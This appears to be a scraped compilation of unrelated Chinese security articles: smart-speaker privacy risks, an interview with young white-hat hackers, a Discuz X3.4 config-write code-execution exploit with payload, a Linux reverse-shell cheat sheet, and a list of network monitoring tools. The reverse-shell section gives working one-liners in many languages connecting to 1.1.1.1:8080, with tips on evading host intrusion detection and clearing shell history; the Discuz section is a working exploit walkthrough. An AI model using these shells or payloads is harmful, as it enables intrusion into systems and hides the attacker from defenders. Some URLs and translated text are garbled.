你需要了解的智能音箱中的6种安全隐患

如果你家里有一台设备,它总是在监听着正在发生的事情,随时准备记录、处理和存储它接收到的任何信息,你会有什么感觉?你可以将它理解为是一种危言耸听的说法,但从本质上讲,它的确是智能音箱具备的功能所能办到的。

你需要了解的智能音箱中的6种安全隐患

智能音箱除了提供音频播放功能之外,也提供了互联网连接功能,通常还提供了数字助理,这极大地扩展了它们的功能。

有了今天的智能音箱,你可以搜索互联网、控制其他家庭自动化设备、在线购物、发送短信、安排闹钟等等。

这种连接性和功能性可能为我们提供了一些方便,但就像智能音箱等任何新的物联网技术一样,安全问题也随之而来。任何时候,只要向网络添加一个节点,就会暴露出更多潜在的漏洞。由于智能家居就目前而言仍然是相对较新的技术,因此它也必然存在漏洞。

尽管智能家居企业一直在尽可能快地修复这些漏洞,并希望确保它们的设备是安全的,但仍然有可能遇到安全问题。以下是你应该注意的6种潜在安全风险:

1. 意料之外的激活

虽然智能音箱始终保持监听状态,因为它们的麦克风一直处于开启状态,但它们不会记录或处理听到的所有内容,除非它们首先检测到其激活短语。对于Google Home,这个短语是“OK,Google”;对于Amazon speaker,请说“Alexa”。

这里有几个问题。首先,这项技术并不不完美,而且很有可能这个设备会把另一个短语错当成激活短语。例如,美国俄勒冈洲的一对夫妇最近就发现,他们的亚马逊Echo智能音箱一直在他们不知情的情况下录制音频。亚马逊将这一错误归咎于在背景对话中“Alexa”的误解,也就是说这对夫妇在日常对话中可能涉及了“Alexa”这个单词。

2. 错误判断语音指令

不幸的是,此类误解可能还超出了激活的范围。这对俄勒冈州夫妇还指出,智能音箱还将录制的音频发送给了他们联系人名单上的随机人员,因为收到录音的人联系了他们。

亚马逊为这部分事件给出了相同的解释。据该公司称,智能音箱错误的将背景谈话视为一系列命令,导致将谈话录音发送给了这对夫妇的联系人。这种情况表明,智能音箱对语音指令的判断技巧可能还达不到正常工作所需要的高度。

3. 不必要的广告互动

除了智能音箱可能会因误解线索并意外唤醒之外,其他人也可以在未经你许可的情况下有目的地主动唤醒它们。一旦他们这样做了,他们就有可能获得一些有关于你的信息。

汉堡王(Burger King)在运行一个广告时体现了这种漏洞,该广告在播放过程中激活了Google Home智能音箱,并促使它们朗读了皇堡(Whopper)的描述。谷歌反应迅速,阻止了设备响应。不过,汉堡王对此进行了反击,他们修改了这则广告,使它再次激活了Google Home智能音箱。

虽然这个恶作剧可能是相对无害的,但足以证明其他人也可能会在未经你许可的情况下激活你的设备。比如,对着你家的大门或敞开的窗户大喊大叫。由于此漏洞,你应该避免使用智能音箱来解锁门窗。当然,最好的主意还是修改你的激活短语。

4. 黑客和恶意软件

到目前为止,大多数关于智能音箱安全问题的报告都围绕着未经授权的访问或功能缺陷展开。这些设备当然也容易受到恶意的黑客攻击。

技术领域的安全专家已经发现了各种敏感漏洞,使制造商能够修复它们。然而,黑客可能会在某个时候先于安全专家发现其中一些漏洞。如果他们这样做了,他们可能就能够访问你的敏感个人信息。

为了避免自己成为黑客事件的受害者,请仅限于使用你信任的公司发布的硬件和软件。另外,请使用安全密码,并经常修改它。

5. 语音黑客

使用智能音箱还可能增加你被语音黑客攻击的可能性,这是身份盗用的一个分支。在这种攻击中,某个人可能会设法获取到你的语音录音,然后用它来访问你的信息。一旦他们有了这个录音,他们就可以用它来欺骗认证系统,认为他们就是你。这是一种绕过智能音箱语音识别功能的潜在方法。

智能音箱提供了一个潜在的音频录音金矿,可以用来进行语音黑客攻击。如果一个不怀好意的人设法侵入了你的音箱,或者存储记录的云服务,他们可以用它来破解你的各种账户。

6. 第三方存储你的数据

一些云服务正在存储这些记录,这一事实可能会让用户感到不舒服。这些录音可能用于个性化你的体验,提高智能助手的有效性,为你提供广告或做一系列其他事情。

幸运的是,如果你可以通过你的帐户设置删除这些数据。此外,倡导人士也在呼吁提高这些公司如何使用客户数据的透明度。

聪明地使用智能音箱

所有的智能技术都会伴随着安全风险。这并不一定意味着我们就不应该使用它们,但这确实意味着我们应该在使用时更加谨慎,并采取适当的安全措施。

如果你是智能音箱的追随者,那么请花时间配置你的安全设置,并仅限于你信任的人进入它们。

能盗社交账号?都是电脑天才?这仨90后小鲜肉黑客有话说

能盗社交账号?都是电脑天才?这仨90后小鲜肉黑客有话说

在普通人眼中,黑客的印象更多来自于影视,坐在一台电脑前面对网络,转瞬便能攻破各种系统,施展出自己的“黑客魔法”。那么,现实生活中的“白帽黑客”,是一个怎样的存在?他们真的亦正亦邪能够自由穿梭在黑白边缘吗?近日,北京晚报记者采访了三名90后“小鲜肉”黑客,看看新生代“白帽黑客”的真实状况,跟你想的可能不太一样。

黑客能盗取社交账号吗?

上午9点,在位于海淀区北四环西路的中国技术交易大厦内,三名90后安全研究员开始了一天的工作。相比于略显平淡安全研究员,他们有个更酷炫的头衔——“白帽黑客”。但让记者略意外的是,他们均表示自己内心对“白帽黑客”的这一称呼并不认同。

提起“黑客”,来自北京交通大学的吴泽楷,内心有着特有的骄傲,“‘黑客’从来不是指那些不负责任,利用低等技术手段去肆意侵犯他人隐私,危害信息安全的破坏者与犯罪者,那些人叫‘骇客’。”

吴泽楷今年只有21岁,是枚标准的“95”后,提起“黑客”满怀热情,又带点对自己技术不甚自信的小青涩。在他看来,“黑客”更多是一群对计算机文化,对计算能力,对互联网文化充满敬畏和狂热的技术专家。与其他“半路出家”的黑客不同,吴泽楷的大学专业就是信息安全。“正是我在课堂上见到了太多高危险等级的病毒给社会带来的危害,才会对破坏信息安全的行为深恶痛绝。”他告诉记者,自己之所以选择成为一名“白帽黑客”,正是源于那股在课堂上涌出的“守护”情结,“感觉自己想做一名骑士,想去对抗眼前网络的黑与恶。”

提起行外人对黑客的刻板印象与误解,吴泽楷与同伴相视一笑,略无奈地说:“十个阿姨辈的人,九个都会问我,你是黑客,你能帮我打开别人的社交账号吗?”对于这个经典误解,吴泽楷表示,黑客肯定不能盗取他人的社交账号,“因为《安全法》有明确规定,搞不好判刑三年。更何况,哪怕我们有这个技术能力去实现,也绝不会做,这和我投身这个职业的初衷是完全相背离的。”

值得一提的是,德国安全研究实验室首席科学家Karsten Nohl对“黑客”行为的理解更为有趣,他曾在去年发现谷歌、三星、小米、中兴等安卓系统存在不完整补丁而收到多家厂商感谢。“我认为接近和理解黑客行为的最好途径是把它看成一项运动,一项脑力与体力的竞赛。它主要是去解决挑战和谜题,根本不是要侵入一个真正的系统,跟犯罪活动更是无关。” Karsten告诉记者,黑客就像运动员,只有通过不停挑战,不停完成一个个目标,才能在技术上变得越来越强。

黑客都是电脑天才吗?

毕业自北京大学的秦策,出生于1992年。在他的身上,记者看到了典型的“黑客气质”:为人略腼腆,回答前多有思考,话不多但时有灼见。“很多人觉得我是黑客,我就一定很聪明,聪明到能转瞬攻破各种网络系统。”秦策耸耸肩表示,其实自己每日的工作并没有大家想象的那么刺激,“哪有动不动就掀起网络攻防战,挖掘并分析常用软件和主流操作系统安全漏洞才是日常。对于我来说,可能在办公桌前低头看一些有关浏览器的国外研究论文和源码,再分析分析漏洞,就是紧张充实的一天。”

尽管毕业自一流高校,但秦策常常觉得自己的智商在“坐过山车”。“我只有在挖到漏洞的那一刹那才觉得自己很聪明,而此前搜寻的漫漫时间里,我都觉得我自己特别笨。”秦策告诉记者,自己常常会花好几个月的时间去研究一个查勘系统,去一点点读代码,理解代码的行为逻辑,设计思路,“整个过程非常烦,只有不断把碎片化的知识汇总,有一天突然找到联系,豁然开朗。”

挖掘操作系统漏洞,与国际互联网厂商“斗智斗勇”并不容易。“像苹果、谷歌,他们的程序员都是世界一流的,资源也非常丰富,他们开发出来的软件,几乎不可能有简单漏洞,何况他们自己也在有意识地不断查找、弥补漏洞。”秦策说,自己有时候一个人工作到深夜,感觉自己要去对抗交手的,都是这个世界上的顶尖程序精英,“相比于天分,这一行里努力和勤奋更重要,要耐得住寂寞,也能坐得了很长时间的冷板凳。”

然而,不是每一个人都有着这样日复一日的耐心与持之以恒的毅力。“我的专业是软件工程,我们那届有50多个研究生,毕业后出来从事安全的,只有我们寝室的三个人,大部分都去做了软件开发。”秦策笑着说,短期来看,软件开发更能收益更高,如果不是由衷热爱信息安全,很难捧起“黑客”这个饭碗,“我每天除了吃饭睡觉,经常研究到凌晨三四点回家,早上九点多就又到实验室来。我不觉得辛苦,而是觉得时间不够用,每一天总会有新的挑战要解决,新的问题在等待。”

孤胆英雄已不太能成功

“有些人想象我的工作状态时,会把我想象成一个‘孤胆英雄’,一个人,一台电脑,在略显狭小的办公空间里日复一日地敲击代码、找到漏洞并拯救整个软件或操作系统,但这早就是很多年前的‘刻板印象’了。”宋凯毕业自哈尔滨工业大学,虽然是90后,但却已斩获不少辉煌战果:他曾连续三年入选微软MSRC全球TOP100贡献者榜单,最高排名第12位。

“如今团队合作非常重要,每名黑客擅长点和聚焦领域不同,搭建起来才是一个完整的团队,实现资源投入产出最大化。”宋凯表示。这种团队合作重要性往往能在紧急时刻凸显出来,“在2017年的Pwn2Own大赛中,微软提前一天发布新补丁,导致我们的参赛备选方案直接被补掉,这个时候你不但不能慌,还要帮助其他人去调整情绪,调试新的方案,没有团队日常建立起的分工协作和相互鼓励是不可能做到的。”

如今“黑客世界”对团队合作的重视,也让白帽黑客非常热衷与世界上其他黑客的交流沟通。“你需要打开全球化视野,去看世界上其他黑客在做什么,从而学到最新的经验。”宋凯告诉记者,最近他在AsiaSecWest国际安全技术峰会—亚洲站发表了主题演讲,提出了将浏览器内存安全漏洞转化为任意代码执行的新方法,“对我来说,没有比站在一个世界级的信息安全技术交流平台上分享中国网络的解决思维更激动的了。”

“有一种黑客精神,叫技术至上、开放分享。”宋凯说,自己在AsiaSecWest国际安全技术峰会上见到了很多国际大咖,他们来自不同背景或领域,有埃因霍芬理工大学的安全教授,也有深谙海军导航技术顶级黑客。”宋凯表示,让他印象特别深刻的,是不少外国的“白帽黑客”自掏腰包,购买1400美元一张的门票一场讲座不落地听了两天,很认真地记笔记,“这种精神特别打动我,也让我意识到,国际上很多白帽黑客很全能,一个人可以擅长非常多的不同方面,靠的就是不断交流学习,厚积薄发。”

来源:北京晚报 本报记者 袁璐 文

Discuz最新版代码执行漏洞

0×00概述

近期审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。

0×01 白盒审计

源码信息:Discuz_X3.4_GIT_SC_UTF8

问题文件: //upload/install/index.php

漏洞类型:配置文件写入导致代码执行

站点地址:http://www.discuz.net/forum-10-1.html

直接看配置信息写入的代码段为 //upload/install/index.php

Discuz最新版代码执行漏洞

看到save_config_file()函数是保存写入配置信息的,配置信息为$_config这个数组,我们跟踪下这个数组;

还是这个文件,代码段为第266行;

Discuz最新版代码执行漏洞

这里的$forceinstall参数即为通过POST接收的配置信息数值为二维数组,看到里面的dbinfo了,这里程序本身未对传入的POST值进行任何过滤,也就存在代码执行问题了。

0×02 漏洞利用

直接安装到写入配置信息的步骤;

Discuz最新版代码执行漏洞

填入正确的数据库用户名账号和密码之后抓包;

Discuz最新版代码执行漏洞

这时候看下具体配置文件,代码段为/upload/uc_server/data/config.inc.php;

Discuz最新版代码执行漏洞

我们以前缀dbinfo[table_pre]参数为利用,看到使用单引号和括号括起来,所以payload为;

payload = pre_’);phpinfo();//

发到上述抓包里点击安装即可写入配置文件;

这时候看这个配置文件;

Discuz最新版代码执行漏洞

直接访问这个文件即可执行;

http://127.0.0.1/Discuz_X3.4_GIT_SC_UTF8/dir_SC_UTF8/upload/uc_server/data/config.inc.php

Discuz最新版代码执行漏洞

0×03 防御

这个漏洞原理比较简单,针对其防御方法是需要对传入的配置信息进行转义处理,这里只要转义单引号就可以了,但是刚开始我有疑惑的点就是这里的payload在实际情况下,我们需要通过类似“爆破”的思路去测试大量payload,但是由于“安装锁”的存在,安装一次就会锁定程序生成install.lock文件防止重装,也就是“爆破”不了,那么这个漏洞是不是就利用不了呢?为了解决这个疑问,我重新看了下安装时候的源码信息,发现这个漏洞还是可以利用的;

Discuz最新版代码执行漏洞

还是在安装的文件里,第478行,可以看到在写入配置信息到config文件之后,下面还会判断当methon为ext_info的时候进行其他操作即生成安装锁文件进行锁定,到这个步骤才是完整的安装操作,也就是和之前的写入配置信息是“分开”进行的,也可通过抓包去看,比较明显,是两个不同的数据包,互相不会干涉,写入配置信息的数据包不会锁定安装程序,所以导致可通过“爆破”去利用,程序这么去设计也是业务逻辑的需求吧,如果写入配置信息的步骤即可生成安装锁文件并且结束安装的话,这个漏洞就利用不了了,除非存在任意文件删除漏洞可以去删除install.lock这个文件。

* 本文作者:davichi8282,转:FreeBuf.COM

Linux下内网反弹技巧总结与杂谈

通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。

一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。

反弹技巧总结:

1、NC反弹

Nc 1.1.1.1 8080 -e /bin/bash

2、Bash-socket反弹

/bin/bash -i > /dev/tcp/1.1.1.1/8080 0<&1 2>&1

3、Shell-socket反弹

a) exec 2>&0;0<&196;

exec 196<>/dev/tcp/1.1.1.1/8080;

sh <&196 >&196 2>&196

b) exec 5<>/dev/tcp/1.1.1.1/8080

cat <&5 | while read line; do $line 2>&5 >&5; done[分两句执行]

4、文件管道-nc/telnet反弹

a) rm /tmp/f;mkfifo /tmp/f;

cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8080 >/tmp/f

b) rm /tmp/backpipe;

mknod /tmp/backpipe p;/bin/bash 0/tmp/backpipe

c) rm /tmp/backpipe;

mknod /tmp/backpipe p && telnet 1.1.1.1 8080 0/tmp/backpipe

5、Bash-telnet反弹

telnet 1.1.1.1 8080 | /bin/bash | telnet 1.1.1.1 9090 [另一个端口]

6、Socat反弹

socat tcp-connect:1.1.1.1:8080 exec:”bash -li”,pty,stderr,setsid,sigint,sane

7、脚本反弹

a) Perl反弹

1) perl -e use Socket;$i=”1.1.1.1″;$p=8080;

socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);

open(STDOUT,”>&S”);open(STDERR,”>&S”);

exec(“/bin/sh -i”);};

2) perl -MIO -e $p=fork;

exit,if($p);

$c=new IO::Socket::INET(PeerAddr,”1.1.1.1:8080″);

STDIN->fdopen($c,r);

$~->fdopen($c,w);system$_ while<>;

b) Python反弹

python -c import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“1.1.1.1”,8080));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

p=subprocess.call([“/bin/sh”,”-i”]);

c) PHP反弹

php -r $sock=fsockopen(“1.1.1.1”,8080);

exec(“/bin/sh -i < &3 >&3 2>&3”);

d) ruby反弹

ruby -rsocket -ef=TCPSocket.open(“1.1.1.1”,8080).to_i;

exec sprintf(“/bin/sh -i < &%d >&%d 2>&%d”,f,f,f)

2) ruby -rsocket -e exit if fork;

c=TCPSocket.new(“1.1.1.1″,”8080”);

while(cmd=c.gets);

IO.popen(cmd,”r”)

{|io|c.print io.read}end

e) lua反弹

lua -e “require(socket);

require(os);

t=socket.tcp();

t:connect(1.1.1.1,8080);

os.execute(/bin/sh -i < &3 >&3 2>&3);”

f) tcl反弹

echo set s [socket 1.1.1.1 8080];

while 42 { puts -nonewline $s “shell>”;

flush $s;

gets $s c;

set e “exec $c”;

if {![catch {set r [eval $e]} err]}

{ puts $s $r };

flush $s; };

close $s; | tclsh

g) awk反弹

awk BEGIN {s = “/inet/tcp/0/1.1.1.1/8080”;

while(42) { do{ printf “shell>” |& s;

s |& getline c;

if(c){ while ((c |& getline) > 0) print $0 |& s;

close(c); } }

while(c != “exit”)

close(s); }} /dev/null

8、二进制程序反弹

Socket程序+命令执行,详见metasploit。

杂谈

市面上反弹shell的脚本和程序非常多,拿metasploit来说,可以生产上百种shell,但解码以后无非以上几种,有趣的时候metasploit生成的无论是脚本反弹程序还是二进制反弹程序多数都是自己实现了system_call,而不是调用系统bash或命令之类,看来做的还是很良心的。

值得一提的是,由于大型甲方公司都会有HIDS防护,目前已知的HIDS,要么修改了bash,要么劫持glibc,要么修改系统底层(这种可能性较低,出问题的几率大)。

当你觉得可以反弹shell的时候一定要提前识别好环境,不然执行了一个bash –i 或nc ,很有可能直接被hids一波带走。

比较推荐使用shell内置反弹或脚本类的反弹shell程序,一般的hids不会记录,非常不建议调用系统bash命令产生反弹,起码.bash_history会妥妥把你出卖掉。

内网shell反弹无论在渗透还是在反渗透中都是一个绕过不开的话题,关于反弹shell,其中有几个有趣的问题:

1. 反弹shell的理解:

内网shell反弹的本质是与公网服务器建立连接,并能将公网服务器传输过来的命令执行,并将结果返回,因此反弹shell涉及两个过程网络建立+命令执行,这两个过程都是衡量反弹功能的标准,网络建立要求复杂加密(如msf: meterpreter_reverse_https等),命令执行则要求尽可能绕开hids和相关记录。

2.交互式shell:

交互式shell是shell最常见的一种,交互式shell区别非交互式shell最大的就是加载了环境变量,交互式shell的使用和在终端terminal中几乎一致。一般来说,远程命令执行反弹出来仅仅是实现了一个非交互式shell。从非交互式shell升级到交互式shell,一个最简单的方式就是用python脚本 pty.spawn(“/bin/bash”)

3. 交互式shell在实际渗透过程中未必比非交互式shell好,因为有经验的甲方都会对环境变量、shell终端加载文件如.bashrc、bash_profile等进行安全处理,直接提升到交互式shell,触发HIDS告警的可能性较高(当然并非绝对)。

(Ps:如果你使用别人的工具,反弹了shell,却不清楚是不是交互式shell,一个简单的方法就是执行history和set命令,如果都有正常返回,那你就要当心了,你可能获取了一个交互式shell,尽快清除history吧。)

2018年的43个最佳网络监控工具

2018年的43个最佳网络监控工具

无论您是系统管理员还是网络管理员,在潜在问题成为生产问题之前对其进行监控至关重要。市场上有大量的网络监控工具,选择一种很难。

以下是Top 43网络监控工具的精选列表,用于监控设备,服务,端口,协议和分析网络流量。

1)SolarWinds网络性能监视器

此网络监视工具可在一小时内自动发现网络设备并进行部署。借助此工具,您可以自定义基于Web的性能仪表板,图表和视图。

特征:

  • 多供应商网络监控
  • 完整的网络见解,提高可见性
  • NetPath和PerfStack可轻松排除故障
  • 适用于大型环境的更智能的可扩展性

下载链接: https //www.solarwinds.com/network-performance-monitor

2)Paessler PRTG

PRTG网络监控软件以其先进的基础架构管理功能而闻名。该工具使用SNMP,WMI,Sniffing,REST APIS,SQL等技术监控IT基础架构。

特征:

  • PRTG可以通过ping定义的IP范围来扫描网段
  • 帮助您使用所需设计创建具有最新监控数据的网页
  • 轻松灵活的警报
  • 多个用户界面
  • 当您在网络中看到警告或异常指标时提醒您。

下载链接: https //www.paessler.com/prtg

3)ManageEngine OpManager

ManageEngine OpMangage是功能强大,用户友好的网络监控软件。您可以借助此工具监控路由器,交换机,防火墙,服务器和VM。

特征:

  • 网络健康监测
  • 监控WAN基础设施上的VoIP呼叫质量,并解决有关VoIP性能的问题。
  • 自动网络映射可视化每个网络中断
  • 持续监控WAN链路可用性。

下载链接: https //www.manageengine.com

4)WhatsUp Gold 2017

WhatsUp Gold简称为(WUG)是一种网络监控软件。仪表板用户友好且具有视觉吸引力。它可以自定义以显示IT基础架构和警报,以满足您的需求。

特征:

  • 自动查找并映射整个网络
  • 使用可自定义警报持续监控网络的运行状况。
  • 报告和仪表板
  • 发现与网络映射
  • 云监控

下载链接: https //www.ipswitch.com/application-and-network-monitoring/whatsup-gold

5)Zabbix

Zabbix是一个开源监控工具。该网络监控工具侧重于监控和趋势功能。该软件广泛用于监控服务器和网络硬件。此工具可以根据历史数据预测未来行为。

特征:

  • 轻松测量网络性能和健康状况
  • 灵活且可扩展的数据收集
  • 各种度量收集方法和协议
  • 配置更改

下载链接: https //www.zabbix.com/

6)Incinga

它是开源基础设施和服务监控工具。Icinga改变并报告您的IT环境的健康状况。所有警报依赖项都将显示在仪表板中,并通过电子邮件,短信或移动消息应用程序发送。

特征:

  • 监督服务
  • 支持直接监控和SNMP监控
  • 允许群集和区域监控
  • 配置和模板

下载链接: https //www.icinga.com/

7)Datadog

Datadog是一种为混合云环境构建的监控工具。Datadog可帮助您分析网络,应用程序和服务的性能。它允许您创建自定义图形,仪表和警报。

特征:

  • 允许您检查系统,应用程序和服务
  • 全面了解您的应用程序。
  • 在上下文中分析和探索日志数据
  • 构建实时交互式仪表板
  • 关键问题的Fash警报。

下载链接: https //www.datadoghq.com

8)ConnectWise Automate

ConnectWise Automate以业务速度解决IT问题。该工具可帮助您消除受支持环境中出现问题之前的盲点。

特征:

  • 删除发送包版广告
  • 获得更好的可见度
  • 以低成本增加服务
  • 快速解决问题

下载链接: https //www.connectwise.com/software/automate

9)逻辑监视器

LogicMonitor是一种自动SaaS网络监控工具。该工具可以自定义仪表板,警报和报告。该工具可以通过提供预测性更改和趋势分析来识别传入问题。

特征:

  • 发现所有网络设备和接口
  • 监视CPU,内存,温度,风扇和其他硬件
  • 跟踪OSPF邻接和BGP会话
  • 观察和警告以太网供电负载
  • 无线接入点监控

下载链接:https://www.logicmonitor.com

10)OP5监视器

OP5 Monitor是基于开源项目Nagios的服务器,网络监控和管理的软件产品。OP5监视器显示IT网络的状态,运行状况和性能。

特征:

  • 日志服务器监控
  • 完全可定制的交互式仪表板
  • 跨分布式环境的无与伦比的可扩展性
  • 从SNMP陷阱中读取,处理和生成警报。
  • 自动自我修复

下载链接: https //www.op5.com/op5-monitor/

11)提琴手

Fiddler是一个Web调试和网络监控工具。它允许您捕获计算机和Internet之间的HTTP流量。它使您能够分析传入和传出数据,以便在发送到浏览器之前监视和评估请求和响应。

特征:

  • Web会话操作
  • 调试来自Pc,Mac或Linux系统以及移动设备的流量
  • HTTP / HTTPS流量记录

下载链接: http //www.telerik.com/fiddler

12)Splunk

Splunk是一种监控工具,可让您简化IT并使其现代化,从而增加正常运行时间和竞争优势。它将使您能够进行无缝监控和故障排除。

特征:

  • 防止业务中断
  • 做出明智的决定
  • 实时和预测性见解
  • IT和业务的可见性
  • 快速解决问题

下载链接: https //www.splunk.com/download

13)潘多拉FMS

Pandora FMS是一种企业级监控解决方案。它为您提供了更大的灵活性,可以解决即时和未预料到的运营问题,包括基础架构和IT流程。

特征:

  • 网络监控
  • WMI监控
  • 有关报告的SLA和KPI指标
  • WYSIWYG Visual Console屏幕和仪表板
  • 多租户,多层访问控制
  • GIS跟踪和查看

下载链接: https //pandorafms.org/en/

14)愤怒的IP扫描仪

Angry IP scanner是Windows,Linux和Mac的网络监控程序。它可以扫描任何范围内的IP地址及其任何端口。愤怒的IP扫描程序ping每个IP地址并检查它是否存活。

特征:

  • 扫描Lan和Internet网络
  • IP范围,随机或任何格式的文件
  • 出口产生各种不同的格式
  • 与许多数据提取器可扩展
  • 提供命令行界面

下载链接: http //angryip.org/download

15)高级IP扫描仪

高级IP扫描仪是免费的网络扫描仪来分析局域网。此网络分析工具可帮助您访问共享文件夹,远程控制计算机,甚至可以关闭计算机。

特征:

  • 无需安装
  • MAC地址检测
  • 将扫描结果导出为CSV

下载链接: http //www.advanced-ip-scanner.com/

16)Capsa Free

Capsa是一款免费的开源网络性能监控工具,用于故障排除,以太网监控和分析。它可以帮助用户学习如何监控网络活动,查找网络问题,增强网络安全性。

特征:

  • 提高评估期刊和临时网络问题的效率等。
  • 它可以让您存储数周或数月的网络数据,并浏览历史网络流量。
  • 减少重建网络问题场景所需的时间和精力。
  • 为网络性能和安全漏洞等提供充分证据。

下载链接: https //www.colaso�6�7�6�7ft.com/capsa-free

17)Nagios

Nagios网络监控工具允许组织在影响关键业务流程之前识别和解决IT基础架构问题。

特征:

  • 综合仪表板
  • 允许您跟踪网络流信息的特定子集
  • 全面了解网络流量,带宽和整体网络运行状况
  • 异常活动发生时接收警报
  • 高级用户选项使IT团队能够高效地协同工作。

下载链接: https //www.nagios.com/products/

18)老兄

Dude网络监视器是一种网络监视工具,可自动扫描指定子网内的所有设备。您可以绘制网络的布局和地图。当某些设备无法正常工作时,它还会提醒您。

特征:

  • 自动网络发现和布局
  • 发现任何类型或品牌的设备
  • 包含设备的SVG图标以便于识别。甚至支持自定义图标和背景。
  • 从远程控制工具直接访问设备管理

下载链接: http //www.mikrotik.com/thedude

19)OpenNMS

它是一种开源网络解决方案,专为构建网络监控解决方案而设计。该工具附带发现引擎,可自动配置和管理网络设备,无需任何人为干预。

特征:

  • 从SNMP,JMX,WMI,NRPE和XMP代理收集性能指标
  • 灵活且可扩展的架构
  • OpenNMS建立在事件驱动的架构之上。
  • 帮助您通过手动,检测或ReST API驱动的界面发现您的网络和应用程序

下载链接: http //www.opennms.org/

20)NetworkMiner

NetworkMiner是一个网络取证分析工具。该工具允许通过解析PCAP文件或数据包嗅探来检测网络主机的操作系统,主机名和开放端口。

特征:

  • 网络取证和嗅探
  • 可以在凭据选项卡下提取支持的协议的用户凭据。
  • 您可以搜索嗅探或存储的数据以查找关键字。
  • NetworkMiner Professional附带专门设计的USB闪存盘。

下载链接: http //www.netresec.com/?page = NetworkMiner

21)GFI LanGuard

允许您使用Gif Languard扫描网络中的漏洞,自动修补并实现合规性。

特征:

  • 操作系统和第三方应用程序的补丁管理
  • 漏洞评估
  • Web报告控制台
  • 跟踪最新漏洞并缺少更新
  • 与安全应用程序集成
  • 支持虚拟环境

下载链接: https //www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard

22)NetXMS

NetXMS是一个开源监控工具,可用于监控整个IT基础架构。它从支持SNMP的硬件开始,以服务器上的应用程序结束。

特征:

  • 旨在实现最高性能和可扩展性
  • 分布式网络监控
  • 帮助您自动检测网络。
  • 通过最少的配置工作快速部署
  • 本机支持各种平台和操作系统

下载链接: https //www.netxms.org/download/

23)总网络监视器

全网络解决方案提供用于监控LAN,计算机和服务的解决方案,需要仔细关注和彻底控制。

特征:

  • 软件许可证管理
  • 网络库存
  • IT资产管理
  • SNMP扫描仪
  • 硬件清单

下载链接: http //www.softinventive.com/total-network-monitor/

24)Zenoss Core

Zenoss是一种混合IT监控工具。它允许您使用分析软件,为云,虚拟和真实IT环境提供全面的可见性。该工具还提供开源核心,企业和SaaS解决方案以及开放API和SDK。

特征:

  • 跨平台设备性能和可用性监控
  • 可定制的基于Web的控制台和仪表板
  • 设备,事件和网络的性能监控
  • 通过ZenPacks实现监控环境的可扩展性和快速定制
  • 设备和设备属性管理

下载链接: http //sourceforge.net/projects/zenoss/

25)Microsoft网络监视器

Microsoft Network Monitor是一种协议分析和网络流量监控工具。此工具可帮助您捕获,查看和分析网络流量。它对于排除网络上的网络问题和应用程序也很方便。

下载链接: http //www.microsoft.com/en-us/download/details.aspx?id = 4865

26)WirelessNetView

WirelessNetView是一个小型网络监控程序,可以在台式机或笔记本电脑的后台运行。它监控您周围的无线网络的活动。它显示SSID,平均信号质量,检测计数器,验证算法等信息。

特征:

  • 它在该站点中的许多实用程序都是用C ++开发的,这使它成为快速且有用的工具
  • 我的所有实用程序都不会向注册表或您的配置文件写任何内容。
  • USB闪存驱动器,无需创建您使用的任何记录
  • 您无需向NirSoft下载或发送电子邮件。

下载链接: http //www.nirsoft.net/utils/wireless_network_view.html

27)监视器

Monitis可帮助您优化网络并避免系统停机。它还可以保持您网络的健康。该工具为各种网络设备(如交换机,电话系统和窗口)提供基于代理和无代理的监控。

特征:

  • 对您网站的全面了解
  • 实时报告
  • 允许Web事务监控
  • 快速检测并解决网络性能问题
  • 网络带宽监控
  • 支持SMTP协议,HTTP,UDP,SIP等TCP协议

下载链接:http://www.monitis.com/network-monitoring

28)NMAP

Nmap是一个用于网络发现和安全审计的开源软件。此网络监视工具允许您执行网络清单,维护服务升级计划等任务。

特征:

  • Nmap工具可免费下载,并附带完整的源代码
  • 支持数十种先进技术,用于映射充满IP过滤器,防火墙,路由器等的网络。
  • 它可以扫描数十万台机器的庞大网络。
  • 对开发人员和用户社区的广泛支持

下载链接: https //nmap.org/

29)NTOP

Ntop提供基于Web的高速流量分析和流量收集。Ntop是以可移植的方式编写的,几乎可以在任何平台上运行 – Linux,Mac和Windows。

特征:

  • 实时网络流量和活动主机
  • 在地理地图中对主机进行地理定位和叠加
  • 分析IP流量并根据源/目标进行排列。
  • 生成HTML5 / AJAX网络流量统计信息。
  • 支持MySQL,ElasticSearch和LogStash导出受监控数据

下载链接: http //www.ntop.org/products/traffic-analysis/ntop/

30)Wireshark

Wireshark是一种广泛使用的网络协议分析仪。它允许检查网络的所有活动。

特征:

  • 深入检查数百个协议
  • 实时捕获和离线分析。
  • 在Windows,Linux,macOS,Solaris和许多其他产品上运行
  • 捕获可通过GUI或通过TTY模式TShark实用程序浏览的所有网络数据。
  • 丰富的VoIP分析

下载链接: https //www.wireshark.org/

31)NAGIOS CORE

Nagios Core充当基本事件调度程序,事件处理器和警报管理器。它具有各种API,用于扩展其执行附加任务的功能。

特征:

  • 可扩展的体系结构,旨在实现灵活性和可伸缩性
  • 允许您检查计划,执行和处理
  • 提供扩展功能,如配置前端,自动发现和分布式监控

下载链接: https //www.nagios.org/projects/nagios-core/

32)Spiceworks

Spice工作是易于使用的网络监控工具,可为您的关键设备提供实时状态和警报。

特征:

  • 它安装简单,易于设置
  • 您可以调整应用内通知或电子邮件的提醒阈值。
  • 支持完全免费。在线或通过电话聊天
  • 快速了解并发现缓慢,缓慢或不堪重负的系统。

下载链接: https //www.spiceworks.com/free-network-monitoring-management-software/

33)Pulseway

RMM软件从单一管理平台远程监控,管理和控制Windows,Mac,Linux和应用程序。

特征:

  • 远程桌面控制
  • 补丁管理
  • 白色标签和报告
  • 高级自动化

下载链接: https //www.pulseway.com/

